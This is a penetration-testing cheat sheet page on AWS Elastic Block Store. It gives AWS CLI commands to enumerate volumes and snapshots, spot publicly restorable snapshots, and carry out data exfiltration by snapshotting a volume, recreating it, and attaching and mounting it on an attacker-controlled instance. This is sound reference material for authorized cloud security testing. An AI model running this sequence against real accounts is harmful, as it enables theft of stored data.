EBS - Elastic Block Store

EBS Enumeration and Exploitation

A block storage system used to store persistent data. used for EC2 instances.

Enumeration

Information about EBS volumes

aws ec2 describe-volumes

All available EBS snapshots

aws ec2 describe-snapshots --owner-ids self
aws ec2 describe-snapshots --owner-ids [account-id] --region [region]

aws ec2 describe-snapshots --owner-ids <owner id> --query "Snapshots[*].[SnapshotId, VolumeId, StartTime]" --output table --region <region>

Create volume permissions - Enumerates the createVolumePermission attribute, which can allow copying of the snapshot into a new volume controlled by the attacker

aws ec2 describe-snapshot-attribute --attribute createVolumePermission --snapshot-id [snapshot-id] --region [region]

aws ec2 describe-snapshot-attribute --attribute createVolumePermission --snapshot-id <snapshot id> --region <region of snapshot>

aws ec2 describe-snapshots --owner-id self --restorable-by-user-ids all --no-paginate --region us-east-1

The value of Group is set to all. This reveals that it is a publicly accessible snapshot and any AWS user will be able to create a volume from this public snapshot into their AWS Account.

Enumerate public snapshots

aws ec2 describe-snapshots --owner-id self --restorable-by-user-ids all --no-paginate --region [region]

Data Exfiltation

Can also be done using the AWS Console

Create a snapshot of the specified volume

aws ec2 create-snapshot --volume-id [volume-id] --description "exfiltration"

Describe all the available EBS snapshots

aws ec2 describe-snapshots --owner-ids self

Create a volume from snapshots

aws ec2 create-volume --snapshot-id [snapshot-id] --available-zone [available-zone]

Describe ec2 instances

aws ec2 describe-instances

Attach specified volume to the ec2-instance

aws ec2 attach-volume --volume-id [volume-id] --instance-id [instance-id] --device /dev/sdfd

Mount volume on EC2 file system

sudo mount /dev/sdfd /new_dir

See Exploit snapshot - EC2

EC2 - Elastic Compute Cloud

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Advanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud

PreviousDynamoDB NextAMI

Last updated 1 month ago